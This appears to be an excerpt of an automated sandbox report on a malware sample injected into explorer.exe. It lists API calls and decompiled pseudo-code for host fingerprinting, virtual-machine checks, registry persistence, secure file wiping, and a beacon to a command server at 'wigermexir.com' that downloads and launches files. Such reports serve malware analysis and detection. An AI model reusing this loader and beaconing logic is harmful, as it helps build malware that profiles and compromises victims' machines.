      • Part of subcall function 007C8B6C: CloseHandle.KERNEL32(?), ref: 007C8B8E
      • Part of subcall function 007C4BA0: GetComputerNameA.KERNEL32(?,00000101), ref: 007C4BC3
      • Part of subcall function 007C4BA0: RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C4C01
      • Part of subcall function 007C4BA0: GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C4D40
      • Part of subcall function 007C5468: GetSystemTime.KERNEL32(?), ref: 007C5472
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
      • Part of subcall function 007C8064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 007C808B
      • Part of subcall function 007C8064: RegDeleteValueA.ADVAPI32(?,?), ref: 007C809D
    • Sleep.KERNELBASE(000003E8), ref: 007C8FC8
    • GetCursorPos.USER32(?), ref: 007C9000
      • Part of subcall function 007C7474: RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C750D
      • Part of subcall function 007C7474: RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C7533
      • Part of subcall function 007C38DC: RtlEnterCriticalSection.NTDLL(?), ref: 007C38E3
      • Part of subcall function 007C38EC: RtlLeaveCriticalSection.NTDLL(?), ref: 007C38F3
      • Part of subcall function 007C5640: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 007C5664
      • Part of subcall function 007C5640: FindFirstFileA.KERNELBASE(?,00000080), ref: 007C5697
      • Part of subcall function 007C5640: FindNextFileA.KERNELBASE(000000FF,00000080), ref: 007C5825
      • Part of subcall function 007C5640: FindClose.KERNEL32(000000FF), ref: 007C583D
      • Part of subcall function 007C84A4: Sleep.KERNEL32(00004E20), ref: 007C8519
      • Part of subcall function 007C84A4: GetTickCount.KERNEL32 ref: 007C86EB
      • Part of subcall function 007C84A4: Sleep.KERNEL32(00003A98), ref: 007C8706
      • Part of subcall function 007C84A4: RtlExitUserThread.NTDLL(00000000), ref: 007C8879
      • Part of subcall function 007C84A4: RtlExitUserThread.NTDLL(00000000), ref: 007C88B6
      • Part of subcall function 007C84A4: Sleep.KERNEL32(000003E8), ref: 007C895F
    • RtlExitUserThread.NTDLL(00000000), ref: 007C9069
      • Part of subcall function 007C41CC: GetCurrentThread.KERNEL32 ref: 007C41DE
      • Part of subcall function 007C41CC: OpenThreadToken.ADVAPI32(00000000), ref: 007C41E5
      • Part of subcall function 007C41CC: GetLastError.KERNEL32 ref: 007C41F4
      • Part of subcall function 007C41CC: GetCurrentProcess.KERNEL32 ref: 007C4207
      • Part of subcall function 007C41CC: OpenProcessToken.ADVAPI32(00000000), ref: 007C420E
      • Part of subcall function 007C41CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 007C4241
      • Part of subcall function 007C41CC: CloseHandle.KERNEL32(?), ref: 007C424E
      • Part of subcall function 007C41CC: AllocateAndInitializeSid.ADVAPI32(007CA2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007C4278
      • Part of subcall function 007C41CC: EqualSid.ADVAPI32(?,?), ref: 007C42A2
      • Part of subcall function 007C41CC: FreeSid.ADVAPI32(?), ref: 007C42BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C6ECE, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163library

    Control-flow Graph

    C-Code - Quality: 66%
    			E007C6ECE(signed char __eax, void* __ecx, void* __edx, void* __esi, char _a1) {
				intOrPtr _v4;
				void* _v8;
				void* _v12;
				struct HINSTANCE__* _v16;
				signed int _v20;
				void* _v28;
				CHAR* _v36;
				void* _v157;
				void* _v188;
				char* __ebp;
				void* _t115;

				_t115 = __ecx;
				_t57 = __eax;
				if(__esi + 1 <= 0) {
					L7:
					__eflags =  *(_t115 - 0x45ffffff) & _t57;
				} else {
					if(__eflags <= 0) {
						asm("lock lea eax, [ebp-0x209]");
						if(E007C1110(__eax, _v16) != 0) {
							_v4 = 0xffffffff;
						}
						E007C1440(_v16);
						return _v4;
					} else {
						asm("rol esi, 1");
						asm("sahf");
						asm("out 0x48, al");
						asm("salc");
						asm("sbb [eax], eax");
						__eax->i = __eax->i + __al;
						__dh = __dh + __al;
						asm("repne shl dl, 0x4a");
						__ebp =  &_a1;
						_push(es);
						asm("rol byte [fs:eax], 0x0");
						_push( &_a1);
						__ebp = __esp;
						__esp = __esp + 0xffffff44;
						__eax = 0;
						_v16 = 0;
						__eax =  *0x7ca55c; // 0x7c6ed0
						_v36 = __eax;
						__eax = _v36;
						__eax = LoadLibraryA(_v36); // executed
						_v20 = __eax;
						__eax = _v36;
						__eax = E007C1440(_v36);
						__eflags = _v20;
						if (_v20 == 0) goto L13;
						goto L7;
					}
				}
			}














    0x007c6ece
    0x007c6ece
    0x007c6ed1
    0x007c6f21
    0x007c6f21
    0x007c6ed3
    0x007c6ed3
    0x007c6ea5
    0x007c6eb6
    0x007c6eb8
    0x007c6eb8
    0x007c6ec2
    0x007c6ecd
    0x007c6ed5
    0x007c6ed5
    0x007c6ed7
    0x007c6ed8
    0x007c6eda
    0x007c6edb
    0x007c6edd
    0x007c6edf
    0x007c6ee1
    0x007c6ee6
    0x007c6ee7
    0x007c6ee8
    0x007c6eec
    0x007c6eed
    0x007c6eef
    0x007c6ef5
    0x007c6ef7
    0x007c6efa
    0x007c6f04
    0x007c6f07
    0x007c6f0b
    0x007c6f11
    0x007c6f14
    0x007c6f17
    0x007c6f1c
    0x007c6f20
    0x00000000
    0x007c6f20
    0x007c6ed3

    APIs
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    • LoadLibraryA.KERNELBASE(?), ref: 007C6F0B
    • SetupDiGetClassDevsA.SETUPAPI(007CA014,00000000,00000000,00000002), ref: 007C6F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 007C6FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 007C6FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 007C6FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007C6FF1
    • SetupDiGetClassDevsA.SETUPAPI(007CA024,00000000,00000000,00000002), ref: 007C7028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 007C7056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 007C707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 007C7096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007C70A0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C6EEC, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 131library

    Control-flow Graph

    C-Code - Quality: 100%
    			E007C6EEC(void* __ecx) {
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				CHAR* _v28;
				void* _v32;
				void* _v161;
				void* _v192;
				intOrPtr _t54;
				struct HINSTANCE__* _t57;

				_v8 = 0;
				_t54 =  *0x7ca55c; // 0x7c6ed0
				_v28 = E007C3F38(_t54);
				_t57 = LoadLibraryA(_v28); // executed
				_v12 = _t57;
				E007C1440(_v28);
				if (_v12 == 0) goto L7;
			}














    0x007c6ef7
    0x007c6efa
    0x007c6f04
    0x007c6f0b
    0x007c6f11
    0x007c6f17
    0x007c6f20

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 007C6F0B
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    • SetupDiGetClassDevsA.SETUPAPI(007CA014,00000000,00000000,00000002), ref: 007C6F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 007C6FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 007C6FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 007C6FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007C6FF1
    • SetupDiGetClassDevsA.SETUPAPI(007CA024,00000000,00000000,00000002), ref: 007C7028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 007C7056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 007C707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 007C7096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007C70A0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C84A4, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 335sleepthread

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 691 7c84a4-7c84dc call 7c13dc 694 7c8521-7c868f call 7c64bc call 7c1308 call 7c133c * 2 call 7c1864 call 7c133c * 2 call 7c1864 call 7c133c * 2 call 7c1164 call 7c133c * 2 call 7c8258 call 7c133c * 4 call 7c1864 call 7c133c 691->694 695 7c84de-7c84f4 call 7c1308 691->695 741 7c8691-7c86a1 call 7c133c 694->741 742 7c86a4-7c86fb call 7c133c call 7c4154 call 7c133c * 2 GetTickCount 694->742 698 7c84f9-7c8506 call 7c5ae8 695->698 702 7c850b-7c8512 698->702 702->694 704 7c8514-7c851f Sleep 702->704 704->698 741->742 753 7c86fd-7c8706 Sleep 742->753 754 7c870c-7c8750 call 7c12dc call 7c5d20 742->754 753->754 759 7c8756-7c8798 call 7c1110 call 7c5468 call 7c7474 754->759 760 7c88c9-7c8913 call 7c1308 call 7c660c 754->760 775 7c879e-7c87bd call 7c1110 759->775 776 7c88bc-7c88c4 call 7c1440 759->776 768 7c8918-7c891a 760->768 769 7c893c-7c8952 768->769 770 7c891c-7c8937 call 7c1308 * 2 768->770 769->694 770->769 783 7c87bf-7c87c6 775->783 784 7c87c8-7c87d1 call 7c1110 775->784 782 7c8957-7c8970 Sleep 776->782 782->782 785 7c8972 782->785 787 7c87d9-7c87dd 783->787 790 7c87d6 784->790 785->694 788 7c87df-7c8843 call 7c1110 call 7c12b8 call 7c10e0 787->788 789 7c8847-7c884b 787->789 788->789 792 7c884d-7c885d call 7c82f8 789->792 793 7c888e-7c889a call 7c7f20 789->793 790->787 802 7c8881-7c8889 call 7c1440 792->802 803 7c885f-7c887f call 7c80c0 call 7c1440 * 2 RtlExitUserThread 792->803 793->776 801 7c889c-7c88b6 call 7c80c0 call 7c1440 * 2 RtlExitUserThread 793->801 801->776 802->694 803->793
    C-Code - Quality: 98%
    			E007C84A4() {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v156;
				char _v4253;
				char _v4382;
				char _v4424;
				char _v4428;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr _t144;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t157;
				intOrPtr _t165;
				intOrPtr _t170;
				intOrPtr _t174;
				intOrPtr _t179;
				intOrPtr _t187;
				void* _t195;
				intOrPtr _t198;
				signed int _t199;
				char _t202;
				intOrPtr _t205;
				signed int _t208;
				char _t210;
				intOrPtr _t220;
				intOrPtr _t228;
				char _t236;
				intOrPtr _t269;
				char _t276;
				intOrPtr _t279;
				intOrPtr _t280;
				intOrPtr _t283;
				intOrPtr _t289;
				intOrPtr* _t290;
				intOrPtr _t291;
				intOrPtr _t292;
				void* _t300;
				void* _t301;
				void* _t317;

				_v68 = _t119;
				_t121 = E007C13DC(0x20000); // executed
				_v40 = _t121;
				_v60 = 0;
				_v64 = 0;
				_v4382 = 0;
				if( *0x7cb77c == 0) {
					_t276 =  *0x7cc355; // 0x0
					_v4428 = _t276;
					E007C1308( &_v4424, 0x7cc384);
					while(1) {
						_t281 =  &_v4428;
						_t279 =  *0x7ca194; // 0x7c1e9c, executed
						_t280 = E007C5AE8(_t279,  &_v4428, 0); // executed
						_v12 = _t280;
						if(_v12 != 0) {
							goto L4;
						}
						Sleep(0x4e20);
					}
					while(1) {
						L4:
						_v48 = 0;
						E007C64BC( &_v156, 0x32, __eflags);
						_t283 =  *0x7ca198; // 0x7c1eac
						E007C1308(_v40, _t283);
						E007C133C(_v40, "1530474054");
						_t131 =  *0x7ca19c; // 0x7c1eb4
						E007C133C(_v40, _t131);
						_t135 =  *0x7cb77c; // 0x0
						E007C1864(_t135,  &_v4253);
						E007C133C(_v40,  &_v4253);
						_t140 =  *0x7ca0bc; // 0x7c1c84
						E007C133C(_v40, _t140);
						_t144 =  *0x7cc380; // 0x0
						E007C1864(_t144,  &_v4253);
						E007C133C(_v40,  &_v4253);
						_t149 =  *0x7ca0c0; // 0x7c1c8c
						E007C133C(_v40, _t149);
						_t152 =  *0x7cc37c; // 0x0
						E007C1164(_t152,  &_v4253);
						E007C133C(_v40,  &_v4253);
						_t157 =  *0x7ca0b4; // 0x7c1c70
						E007C133C(_v40, _t157);
						E007C8258( &_v4253); // executed
						E007C133C(_v40,  &_v4253);
						_t165 =  *0x7ca0b8; // 0x7c1c78
						E007C133C(_v40, _t165);
						E007C133C(_v40, 0x7c8984);
						_t170 =  *0x7ca0c4; // 0x7c1c94
						E007C133C(_v40, _t170);
						_t174 =  *0x7cc355; // 0x0
						E007C1864(_t174,  &_v4253);
						E007C133C(_v40,  &_v4253);
						_t317 = _t301 + 0x80;
						__eflags = _v4382;
						if(_v4382 != 0) {
							E007C133C(_v40,  &_v4382);
							_t317 = _t317 + 8;
						}
						_t179 =  *0x7ca1bc; // 0x7c1ef8
						E007C133C(_v40, _t179);
						E007C4154( &_v4253);
						E007C133C(_v40,  &_v4253);
						_t187 =  *0x7ca0c8; // 0x7c1c9c
						E007C133C(_v40, _t187);
						_t301 = _t317 + 0x18;
						_v8 = 0;
						_v44 = GetTickCount();
						__eflags = _v44 - 0x3a98;
						if(_v44 < 0x3a98) {
							__eflags = 0x3a98;
							Sleep(0x3a98 - _v44);
						}
						_t195 = E007C12DC(_v40);
						_t198 =  *0x7cc230; // 0x7c23ae
						_t199 =  *0x7cb784; // 0xd4
						_v12 = E007C5D20(_t281, _t199 &  *0x7ca074, _t198,  &_v156, "wigermexir.com/auth/", 0x7cc355, _v40, _t195,  &_v16,  &_v20);
						__eflags = _v12;
						if(_v12 == 0) {
							break;
						}
						_t289 =  *0x7ca240; // 0x7c20a8
						_v36 = E007C1110(_v16, _t289);
						_v24 = _v16;
						_t220 =  *0x7cc355; // 0x0
						 *0x7cb64d = _t220;
						 *0x7cb780 = E007C5468();
						E007C7474(0x7cb61c, __eflags);
						_t290 =  *0x7ca1a8; // 0x7c1ecc
						__eflags =  *_v24 -  *_t290;
						if( *_v24 ==  *_t290) {
							L21:
							E007C1440(_v16);
							do {
								_v48 = _v48 + 1;
								Sleep(0x3e8);
								_v52 = _v52 + 1;
								_t228 =  *0x7cb715; // 0x12c
								__eflags = _t228 - _v48;
							} while (__eflags > 0);
							continue;
						}
						_v56 = 0;
						_v28 = 0;
						_t291 =  *0x7ca190; // 0x7c1e8c
						_v28 = E007C1110(_v24, _t291);
						__eflags = _v28;
						if(_v28 == 0) {
							_t292 =  *0x7ca18c; // 0x7c1e7c
							_v28 = E007C1110(_v24, _t292);
						} else {
							_v56 = 0xffffffff;
						}
						__eflags = _v28;
						if(_v28 != 0) {
							_v44 = _v28 - _v24;
							_v28 = _v28 + 0xd;
							_v36 = E007C1110(_v28, E007C8988);
							_v32 = _v36 - _v28;
							_t281 = _v32;
							E007C12B8( &_v4253, _v32, _v28);
							 *((char*)(_t300 + _v32 - 0x1099)) = 0;
							_v32 = E007C10E0( &_v4253, _v28);
							_t269 = _v36 + 2;
							__eflags = _t269;
							_v28 = _t269;
							 *((char*)(_v24 + _v44)) = 0;
						}
						__eflags = _v56;
						if(__eflags == 0) {
							L19:
							_t236 = E007C7F20(_v24, _t281, 4);
							__eflags = _t236;
							if(_t236 != 0) {
								E007C80C0(_v56);
								E007C1440(_v40);
								E007C1440(_v16);
								_push(0);
								RtlExitUserThread();
							}
							goto L21;
						} else {
							_t281 = _v32;
							__eflags = E007C82F8(_v24, _v32, _v28, __eflags);
							if(__eflags == 0) {
								E007C1440(_v16);
								continue;
							}
							E007C80C0(_v56);
							E007C1440(_v40);
							E007C1440(_v16);
							_push(0);
							RtlExitUserThread();
							goto L19;
						}
					}
					_t202 =  *0x7cc355; // 0x0
					_v4428 = _t202;
					E007C1308( &_v4424, 0x7cc384);
					_t205 =  *0x7cb651; // 0x5b3d3566
					_t208 =  *0x7cb784; // 0xd4
					_t281 =  *0x7cb780; // 0x5b3d3566, executed
					_t210 = E007C660C(_t208 &  *0x7ca074, _t281, 0x7cb625, __eflags, 0x7cba00,  &_v4428,  &_v4253, _t205); // executed
					__eflags = _t210;
					if(__eflags != 0) {
						E007C1308(0x7cb625,  &_v4253);
						E007C1308(0x7cc254,  &_v4253);
					}
					 *0x7cc355 = _v4428;
					 *0x7cb64d = _v4428;
				}
			}




























































    0x007c84b4
    0x007c84bc
    0x007c84c1
    0x007c84c6
    0x007c84cb
    0x007c84ce
    0x007c84dc
    0x007c84de
    0x007c84e3
    0x007c84f4
    0x007c84f9
    0x007c84f9
    0x007c8501
    0x007c8506
    0x007c850b
    0x007c8512
    0x00000000
    0x00000000
    0x007c8519
    0x007c8519
    0x007c8521
    0x007c8521
    0x007c8523
    0x007c852e
    0x007c8533
    0x007c853c
    0x007c854a
    0x007c8552
    0x007c855c
    0x007c856b
    0x007c8571
    0x007c8584
    0x007c858c
    0x007c8596
    0x007c85a5
    0x007c85ab
    0x007c85be
    0x007c85c6
    0x007c85d0
    0x007c85de
    0x007c85e3
    0x007c85f3
    0x007c85fb
    0x007c8605
    0x007c8613
    0x007c8623
    0x007c862b
    0x007c8635
    0x007c8646
    0x007c864e
    0x007c8658
    0x007c8667
    0x007c866d
    0x007c8680
    0x007c8685
    0x007c8688
    0x007c868f
    0x007c869c
    0x007c86a1
    0x007c86a1
    0x007c86a4
    0x007c86ae
    0x007c86bc
    0x007c86cc
    0x007c86d4
    0x007c86de
    0x007c86e3
    0x007c86e8
    0x007c86f1
    0x007c86f4
    0x007c86fb
    0x007c8702
    0x007c8706
    0x007c8706
    0x007c8717
    0x007c8732
    0x007c8738
    0x007c8749
    0x007c874c
    0x007c8750
    0x00000000
    0x00000000
    0x007c8756
    0x007c8764
    0x007c876a
    0x007c876d
    0x007c8772
    0x007c877c
    0x007c8786
    0x007c8790
    0x007c8796
    0x007c8798
    0x007c88bc
    0x007c88bf
    0x007c8957
    0x007c8957
    0x007c895f
    0x007c8965
    0x007c8968
    0x007c896d
    0x007c896d
    0x00000000
    0x007c8972
    0x007c87a0
    0x007c87a5
    0x007c87a8
    0x007c87b6
    0x007c87b9
    0x007c87bd
    0x007c87c8
    0x007c87d6
    0x007c87bf
    0x007c87bf
    0x007c87bf
    0x007c87d9
    0x007c87dd
    0x007c87e5
    0x007c87ee
    0x007c87fe
    0x007c8807
    0x007c8810
    0x007c8816
    0x007c881e
    0x007c8831
    0x007c8837
    0x007c8837
    0x007c883a
    0x007c8843
    0x007c8843
    0x007c8847
    0x007c884b
    0x007c888e
    0x007c8893
    0x007c8898
    0x007c889a
    0x007c889f
    0x007c88a7
    0x007c88af
    0x007c88b4
    0x007c88b6
    0x007c88b6
    0x00000000
    0x007c884d
    0x007c884d
    0x007c885b
    0x007c885d
    0x007c8884
    0x00000000
    0x007c8884
    0x007c8862
    0x007c886a
    0x007c8872
    0x007c8877
    0x007c8879
    0x00000000
    0x007c8879
    0x007c884b
    0x007c88c9
    0x007c88ce
    0x007c88df
    0x007c88e4
    0x007c8902
    0x007c890d
    0x007c8913
    0x007c8918
    0x007c891a
    0x007c8927
    0x007c8937
    0x007c8937
    0x007c8942
    0x007c894d
    0x007c894d

    APIs
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
    • Sleep.KERNEL32(00004E20), ref: 007C8519
      • Part of subcall function 007C64BC: GetVersionExA.KERNEL32(0000009C), ref: 007C6530
      • Part of subcall function 007C1864: wsprintfA.USER32 ref: 007C1874
      • Part of subcall function 007C8258: WSAStartup.WS2_32(00000101,?), ref: 007C8276
      • Part of subcall function 007C8258: gethostname.WS2_32(?,00000040), ref: 007C8282
      • Part of subcall function 007C8258: gethostbyname.WS2_32(?), ref: 007C828C
      • Part of subcall function 007C8258: inet_ntoa.WS2_32(?), ref: 007C82B6
      • Part of subcall function 007C8258: WSACleanup.WS2_32 ref: 007C82E9
      • Part of subcall function 007C4154: GetKeyboardLayoutList.USER32(00000009,?), ref: 007C4169
    • GetTickCount.KERNEL32 ref: 007C86EB
    • Sleep.KERNEL32(00003A98), ref: 007C8706
      • Part of subcall function 007C5468: GetSystemTime.KERNEL32(?), ref: 007C5472
      • Part of subcall function 007C7474: RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C750D
      • Part of subcall function 007C7474: RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C7533
    • RtlExitUserThread.NTDLL(00000000), ref: 007C88B6
      • Part of subcall function 007C82F8: GetTempPathA.KERNEL32(00000201,?), ref: 007C8364
      • Part of subcall function 007C82F8: Sleep.KERNEL32(000005DC), ref: 007C83E3
      • Part of subcall function 007C82F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007C840C
      • Part of subcall function 007C82F8: wsprintfA.USER32 ref: 007C8476
    • RtlExitUserThread.NTDLL(00000000), ref: 007C8879
      • Part of subcall function 007C80C0: RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007C80DB
      • Part of subcall function 007C80C0: CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007C80E9
      • Part of subcall function 007C80C0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C8106
      • Part of subcall function 007C80C0: CloseHandle.KERNEL32(00000000), ref: 007C8112
      • Part of subcall function 007C80C0: SendMessageA.USER32(00060258,00000010,00000000,00000000), ref: 007C8184
      • Part of subcall function 007C80C0: SHDeleteKeyA.SHLWAPI(80000002,007C21A4), ref: 007C81BB
      • Part of subcall function 007C80C0: SHDeleteKeyA.SHLWAPI(80000001,007C21A4), ref: 007C81FB
      • Part of subcall function 007C80C0: ReleaseMutex.KERNEL32(00000228), ref: 007C8221
      • Part of subcall function 007C80C0: CloseHandle.KERNEL32(00000228), ref: 007C822D
      • Part of subcall function 007C80C0: ExitProcess.KERNEL32 ref: 007C8244
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
      • Part of subcall function 007C660C: Sleep.KERNEL32(000927C0), ref: 007C66F5
      • Part of subcall function 007C660C: GetTickCount.KERNEL32 ref: 007C66FD
      • Part of subcall function 007C660C: GetTickCount.KERNEL32 ref: 007C67AF
      • Part of subcall function 007C660C: Sleep.KERNELBASE(00001388), ref: 007C67CD
      • Part of subcall function 007C660C: Sleep.KERNELBASE(000493E0), ref: 007C67F3
      • Part of subcall function 007C660C: Sleep.KERNEL32(000927C0), ref: 007C680F
    • Sleep.KERNEL32(000003E8), ref: 007C895F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C4608, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 88sleepfile

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 820 7c4608-7c4624 821 7c4627-7c4637 call 7c3988 820->821 824 7c4639-7c4640 821->824 825 7c4645-7c4668 CreateFileA 821->825 826 7c470a-7c4718 call 7c1440 824->826 827 7c466a-7c4682 GetFileSize 825->827 828 7c46c6-7c46d7 DeleteFileA 825->828 831 7c4684-7c4687 827->831 832 7c46b2-7c46c0 FlushFileBuffers CloseHandle 827->832 828->826 830 7c46d9-7c46dd 828->830 830->826 834 7c46df-7c46e3 830->834 835 7c468e-7c46b0 WriteFile 831->835 832->828 836 7c46f6-7c4705 Sleep 834->836 837 7c46e5-7c46f1 Sleep 834->837 835->832 835->835 836->821 837->821
    C-Code - Quality: 96%
    			E007C4608(intOrPtr* _a4) {
				long _v8;
				CHAR* _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				void _v548;
				signed int _t42;
				void* _t46;
				int _t48;
				char _t58;

				_v8 = 0;
				_v16 =  *_a4;
				_v12 = _a4 + 4;
				while(1) {
					_t42 = E007C3988(_v12); // executed
					asm("sbb eax, eax");
					if( ~( ~_t42) == 0) {
						break;
					}
					_t46 = CreateFileA(_v12, 0xc0000000, 0, 0, 3, 0x20000080, 0); // executed
					_v20 = _t46;
					if(_v20 == 0xffffffff) {
						L8:
						_t48 = DeleteFileA(_v12); // executed
						_v8 = _t48;
						if(_v8 != 0 || _v16 == 0) {
							L13:
							E007C1440(_a4);
							return _v8;
						} else {
							if(_v16 <= 0x64) {
								Sleep(_v16);
								_v16 = 0;
							} else {
								Sleep(0x64);
								_v16 = _v16 - 0x64;
							}
							continue;
						}
					}
					_v24 = GetFileSize(_v20, 0);
					_t58 = (_v24 >> 9) + 1;
					if(_t58 <= 0) {
						L7:
						FlushFileBuffers(_v20);
						CloseHandle(_v20);
						goto L8;
					}
					_v36 = _t58;
					_v28 = 1;
					do {
						WriteFile(_v20,  &_v548, 0x200,  &_v32, 0); // executed
						_v28 = _v28 + 1;
						_t21 =  &_v36;
						 *_t21 = _v36 - 1;
					} while ( *_t21 != 0);
					goto L7;
				}
				_v8 = 0xffffffff;
				goto L13;
			}
















    0x007c4613
    0x007c461b
    0x007c4624
    0x007c4627
    0x007c462a
    0x007c4631
    0x007c4637
    0x00000000
    0x00000000
    0x007c465b
    0x007c4661
    0x007c4668
    0x007c46c6
    0x007c46ca
    0x007c46d0
    0x007c46d7
    0x007c470a
    0x007c470d
    0x007c4718
    0x007c46df
    0x007c46e3
    0x007c46fa
    0x007c4702
    0x007c46e5
    0x007c46e7
    0x007c46ed
    0x007c46ed
    0x00000000
    0x007c46e3
    0x007c46d7
    0x007c4676
    0x007c467f
    0x007c4682
    0x007c46b2
    0x007c46b6
    0x007c46c0
    0x00000000
    0x007c46c0
    0x007c4684
    0x007c4687
    0x007c468e
    0x007c46a4
    0x007c46aa
    0x007c46ad
    0x007c46ad
    0x007c46ad
    0x00000000
    0x007c468e
    0x007c4639
    0x00000000

    APIs
      • Part of subcall function 007C3988: FindFirstFileA.KERNELBASE(?,?), ref: 007C39A4
      • Part of subcall function 007C3988: FindClose.KERNEL32(000000FF), ref: 007C39BF
    • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,20000080,00000000), ref: 007C465B
    • GetFileSize.KERNEL32(000000FF,00000000), ref: 007C4670
    • WriteFile.KERNELBASE(000000FF,?,00000200,?,00000000), ref: 007C46A4
    • FlushFileBuffers.KERNEL32(000000FF), ref: 007C46B6
    • CloseHandle.KERNEL32(000000FF), ref: 007C46C0
    • DeleteFileA.KERNELBASE(?), ref: 007C46CA
    • Sleep.KERNEL32(00000064), ref: 007C46E7
    • Sleep.KERNEL32(00000064), ref: 007C46FA
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C660C, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 214sleep

    Control-flow Graph

    • Executed
    • Not Executed
